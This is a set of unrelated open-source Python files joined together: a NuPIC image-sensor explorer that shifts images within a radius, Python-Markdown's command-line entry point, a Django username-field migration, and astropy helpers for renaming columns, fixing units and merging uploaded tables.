if _VERSION_SUFFIX:
__version__ = '{}-{}'.format(__version__, _VERSION_SUFFIX)
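# With the values above ('0', '14', '0' and the 'dev' suffix), __version__ evaluates
# to '0.14.0-dev'; on a release branch with _VERSION_SUFFIX = '' it would simply be
# '0.14.0'.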
|
Lyleo/nupic
|
refs/heads/master
|
nupic/regions/ImageSensorExplorers/Jiggle.py
|
8
|
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
from nupic.regions.ImageSensorExplorers.SpiralSweep import SpiralSweep
DEBUG = 0
class Jiggle(SpiralSweep):
"""
This explorer jiggles the image around each possible location within a specified
radius, being careful not to repeat movements already performed between any
two locations for maximum efficiency.
This explorer can be an efficient means of training a first order temporal
learner for translation shifts within a certain radius from center.
"""
def __init__(self, shift=1, radius=1, *args, **kwargs):
"""
@param shift -- Number of pixels to shift each time.
@param radius -- maximum amount to move away from center. Must be a multiple
of 'shift'
"""
assert(radius >= 1)
SpiralSweep.__init__(self, radius, *args, **kwargs)
if (radius % shift) != 0:
raise RuntimeError("radius must be a multiple of shift")
# Generate the location offsets that we will move to for each image
self.offsets = self._generateOffsets(shift, radius)
self.index = 0
def _generateOffsets(self, shift, radius):
"""
Generate the list of offsets we will visit for each image/filter combination
@param shift - how much each location is separated by
@param radius - maximum radius away from center to move
"""
# Table mapping a jiggle index to the relative location
gJiggleOffsets = [ \
# direction jiggleIndex's
( 0, shift), # up (1,2)
(-shift, shift), # up-right (3,4)
(-shift, 0), # right (5,6)
(-shift,-shift), # down-right (7,8)
( 0, -shift), # down (9,10)
( shift,-shift), # down-left (11,12)
( shift, 0), # left (13,14)
( shift, shift), # up-left (15,16)
]
gJigglesPerformed = []
# ------------------------------------------------------------------------
# Find the next "jiggle" for the current offset
def nextJiggle(location, jiggleIndex, jiggleOffsets, jigglesPerformed):
"""
Find the next jiggle around the current location
@param location - current location
@param jiggleIndex - current jiggle index
@param jiggleOffsets - table of jiggle offsets for each location
@param jigglesPerformed - which jiggles we've performed already between
all possible locations
@retval (jiggleIndex, jiggleTo)
or None if we've already visited all neighbors from this location
"""
#global jigglesPerformed, jiggleOffsets
while True:
jiggleIndex += 1
if jiggleIndex > 16:
return (None, None)
src = tuple(location)
dst = (src[0] + jiggleOffsets[(jiggleIndex-1)/2][0],
src[1] + jiggleOffsets[(jiggleIndex-1)/2][1])
# If the dst is outside our radius, skip it
if max(abs(dst[0]), abs(dst[1])) > radius:
continue
# Going away or coming back?
if (jiggleIndex & 1) == 0:
(src, dst) = (dst, src)
# If we've already performed this transition between src and dst, skip it
if (jiggleIndex & 1):
awayJiggle = (src, dst)
backJiggle = (dst, src)
if awayJiggle in jigglesPerformed and \
backJiggle in jigglesPerformed:
if DEBUG >= 2: print "already performed jiggle", jiggleIndex, ", skipping"
jiggleIndex += 1
continue
# Add these jiggles to those performed
jigglesPerformed += [awayJiggle, backJiggle]
# Move to dst
if DEBUG >= 2:
print "jiggleIndex:", jiggleIndex, "location:", location,
print "relPosition:", dst
return (jiggleIndex, dst)
# --------------------------------------------------------------------------
# Loop through each location within the radius and find all the jiggles
# Locations are encoded (x, y) and higher values move towards the top-left
location = [radius, radius] # top-left corner
offsets = [tuple(location)]
while True:
jiggleIndex = 0
# ...............................
# Next jiggle at this location
while True:
(jiggleIndex, offset) = nextJiggle(location, jiggleIndex, gJiggleOffsets,
gJigglesPerformed)
if offset is None:
break
offsets += [offset]
# ...............................
# Next location
# Next location to the right
location[0] -= shift
if location[0] >= -radius:
offsets += [tuple(location)]
continue
# Next row down, on the left
location[0] = radius
location[1] -= shift
if location[1] >= -radius:
offsets += [tuple(location)]
continue
# Exhausted all locations, break out
break
return offsets
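# A minimal instantiation sketch (illustrative parameters only; any additional
# ImageSensor explorer arguments accepted by SpiralSweep are omitted here):
#   explorer = Jiggle(shift=1, radius=2)
# is valid because radius is a multiple of shift, whereas Jiggle(shift=2, radius=3)
# would raise RuntimeError.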
|
ltilve/ChromiumGStreamerBackend
|
refs/heads/master
|
third_party/markdown/__main__.py
|
109
|
# markdown is released under the BSD license
# Copyright 2007, 2008 The Python Markdown Project (v. 1.7 and later)
# Copyright 2004, 2005, 2006 Yuri Takhteyev (v. 0.2-1.6b)
# Copyright 2004 Manfred Stienstra (the original version)
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the <organization> nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE PYTHON MARKDOWN PROJECT ''AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL ANY CONTRIBUTORS TO THE PYTHON MARKDOWN PROJECT
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
COMMAND-LINE SPECIFIC STUFF
=============================================================================
"""
import markdown
import sys
import optparse
import logging
from logging import DEBUG, INFO, CRITICAL
logger = logging.getLogger('MARKDOWN')
def parse_options():
"""
Define and parse `optparse` options for command-line usage.
"""
usage = """%prog [options] [INPUTFILE]
(STDIN is assumed if no INPUTFILE is given)"""
desc = "A Python implementation of John Gruber's Markdown. " \
"http://packages.python.org/Markdown/"
ver = "%%prog %s" % markdown.version
parser = optparse.OptionParser(usage=usage, description=desc, version=ver)
parser.add_option("-f", "--file", dest="filename", default=None,
help="Write output to OUTPUT_FILE. Defaults to STDOUT.",
metavar="OUTPUT_FILE")
parser.add_option("-e", "--encoding", dest="encoding",
help="Encoding for input and output files.",)
parser.add_option("-q", "--quiet", default = CRITICAL,
action="store_const", const=CRITICAL+10, dest="verbose",
help="Suppress all warnings.")
parser.add_option("-v", "--verbose",
action="store_const", const=INFO, dest="verbose",
help="Print all warnings.")
parser.add_option("-s", "--safe", dest="safe", default=False,
metavar="SAFE_MODE",
help="'replace', 'remove' or 'escape' HTML tags in input")
parser.add_option("-o", "--output_format", dest="output_format",
default='xhtml1', metavar="OUTPUT_FORMAT",
help="'xhtml1' (default), 'html4' or 'html5'.")
parser.add_option("--noisy",
action="store_const", const=DEBUG, dest="verbose",
help="Print debug messages.")
parser.add_option("-x", "--extension", action="append", dest="extensions",
help = "Load extension EXTENSION.", metavar="EXTENSION")
parser.add_option("-n", "--no_lazy_ol", dest="lazy_ol",
action='store_false', default=True,
help="Observe number of first item of ordered lists.")
(options, args) = parser.parse_args()
if len(args) == 0:
input_file = None
else:
input_file = args[0]
if not options.extensions:
options.extensions = []
return {'input': input_file,
'output': options.filename,
'safe_mode': options.safe,
'extensions': options.extensions,
'encoding': options.encoding,
'output_format': options.output_format,
'lazy_ol': options.lazy_ol}, options.verbose
def run():
"""Run Markdown from the command line."""
# Parse options and adjust logging level if necessary
options, logging_level = parse_options()
if not options: sys.exit(2)
logger.setLevel(logging_level)
logger.addHandler(logging.StreamHandler())
# Run
markdown.markdownFromFile(**options)
if __name__ == '__main__':
# Support running module as a commandline command.
# Python 2.5 & 2.6 do: `python -m markdown.__main__ [options] [args]`.
# Python 2.7 & 3.x do: `python -m markdown [options] [args]`.
run()
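# Example invocation (illustrative file names; the 'extra' extension ships with
# Python-Markdown):
#   python -m markdown -x extra -f out.html in.txt
# reads in.txt, loads the 'extra' extension and writes XHTML output to out.html.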
|
watchdogpolska/bliski_publikator
|
refs/heads/master
|
bliski_publikator/users/migrations/0002_auto_20160414_0903.py
|
1
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-04-14 09:03
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='user',
name='username',
field=models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 30 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=30, unique=True, validators=[django.core.validators.RegexValidator('^[\\w.@+-]+$', 'Enter a valid username. This value may contain only letters, numbers and @/./+/-/_ characters.')], verbose_name='username'),
),
]
|
adamginsburg/frontend
|
refs/heads/master
|
ingest_datasets_better.py
|
3
|
import numpy as np
from astropy import table
from astropy.table import Table,Column
from astropy import units as u
import re
import string
unit_mapping = {'SurfaceDensity':u.M_sun/u.pc**2,
'VelocityDispersion':u.km/u.s,
'Radius':u.pc}
def fix_logical(t):
"""
Convert a boolean column from string to boolean
"""
newcols = []
for col in t.columns.values():
if col.dtype.str.endswith('S5') or col.dtype.str.endswith('S4'):
falses = col == 'False'
trues = col == 'True'
if np.all(falses | trues):
col = t.ColumnClass(trues, name=col.name)
newcols.append(col)
return Table(newcols)
def reorder_columns(tbl, order):
"""
Sort the columns into an order set by the order list
"""
cols = [tbl[colname] for colname in order]
return Table(cols)
def rename_columns(tbl, mapping = {'name':'Names', 'id':'IDs',
'surfdens':'SurfaceDensity',
'vdisp':'VelocityDispersion',
'radius':'Radius','is_sim':'IsSimulated'},
remove_column='Ignore'):
"""
Rename table columns inplace
"""
for k,v in mapping.items():
if k in tbl.colnames:
if v == remove_column:
tbl.remove_column(k)
elif k != v:
tbl.rename_column(k,v)
def fix_bad_colnames(tbl):
"""
Remove bad characters in column names
"""
badchars = re.compile("[^A-Za-z0-9_]")
for k in tbl.colnames:
if badchars.search(k):
tbl.rename_column(k, badchars.sub("", k))
print("Renamed {0} to {1}".format(k, badchars.sub("", k)))
def fix_bad_types(tbl):
"""
For all columns that *can* be converted to float, convert them to float
"""
columns = []
for columnname, column in tbl.columns.items():
try:
col = Column(data=column.astype('float'), name=column.name)
columns.append(col)
except:
columns.append(column)
return Table(columns)
def set_units(tbl, units=unit_mapping):
"""
Set the units of the table to the specified units.
WARNING: this *overwrites* existing units, it does not convert them!
"""
for k,v in units.items():
if k not in tbl.colnames:
raise KeyError("{0} not in table: run `rename_columns` first.".format(k))
#DEBUG print 'BEFORE unit for',k,":",tbl[k].unit
if v:
# only set units if there is a unit to be specified
tbl[k].unit = v
#DEBUG print 'AFTER unit for',k,":",tbl[k].unit
def convert_units(tbl, units=unit_mapping):
"""
Convert from the units used in the table to the specified units.
"""
for k,v in units.items():
if k not in tbl.colnames:
raise KeyError("{0} not in table: run `rename_columns` first.".format(k))
tbl[k] = tbl[k].to(v)
tbl[k].unit = v
def add_name_column(tbl, name):
"""
Add the person's name as a column
"""
tbl.add_column(table.Column(name='Names', data=[name]*len(tbl)), index=0)
def add_filename_column(tbl, filename):
"""
Add the filename as a column
"""
tbl.add_column(table.Column(name='Filename', data=[filename]*len(tbl)))
def add_timestamp_column(tbl, timestamp):
"""
Add the current date and time as a column
"""
tbl.add_column(table.Column(name='Timestamp', data=[timestamp]*len(tbl)))
def add_is_gal_column(tbl, is_gal):
"""
Add IsGalactic column
"""
tbl.add_column(table.Column(name='IsGalactic', data=[is_gal]*len(tbl)))
def append_table(merged_table, table_to_add):
"""
Append a new table to the original
"""
for row in table_to_add:
merged_table.add_row(row)
def add_generic_ids_if_needed(tbl):
"""
Add numbered IDs if no IDs column is provided
"""
if 'IDs' not in tbl.colnames:
tbl.add_column(table.Column(data=np.arange(len(tbl)), name='IDs'))
def add_is_sim_if_needed(tbl, is_sim=True):
"""
Add is_sim if no is_sim column is provided
"""
if 'IsSimulated' not in tbl.colnames:
tbl.add_column(table.Column(data=[is_sim]*(len(tbl)), name='IsSimulated'))
def add_is_gal_if_needed(tbl, is_gal=True):
"""
Add is_gal if no is_gal column is provided
"""
if 'IsGalactic' not in tbl.colnames:
tbl.add_column(table.Column(data=[is_gal]*(len(tbl)), name='IsGalactic'))
def ignore_duplicates(table, duplicates):
"""
If entries in upload data duplicate entries already in table, ignore them.
Needs list of duplicates, which is constructed elsewhere.
"""
to_delete = []
for row in table:
name = row['Names']
id = row['IDs']
if id in duplicates:
if duplicates[id] == name:
to_delete.append(row.index)
table.remove_rows(to_delete)
def update_duplicates(merged_table, duplicates):
"""
If entries in upload data duplicate entries already in table, remove
the versions already in the table. Needs list of duplicates, which is
constructed elsewhere.
"""
to_delete = []
for row in merged_table:
name = row['Names']
id = row['IDs']
if id in duplicates:
if duplicates[id] == name:
to_delete.append(row.index)
merged_table.remove_rows(to_delete)
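# A minimal usage sketch of the helpers above (hypothetical file and uploader names,
# shown only to illustrate the intended call order):
#
#   tbl = Table.read('clouds.ecsv') # hypothetical input file
#   rename_columns(tbl) # map raw column names to the canonical ones
#   tbl = fix_bad_types(tbl) # coerce numeric-looking columns to float
#   convert_units(tbl) # convert units (or set_units() to overwrite them)
#   add_name_column(tbl, 'uploader') # hypothetical uploader name
#   add_generic_ids_if_needed(tbl)
#   add_is_sim_if_needed(tbl, is_sim=False)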
|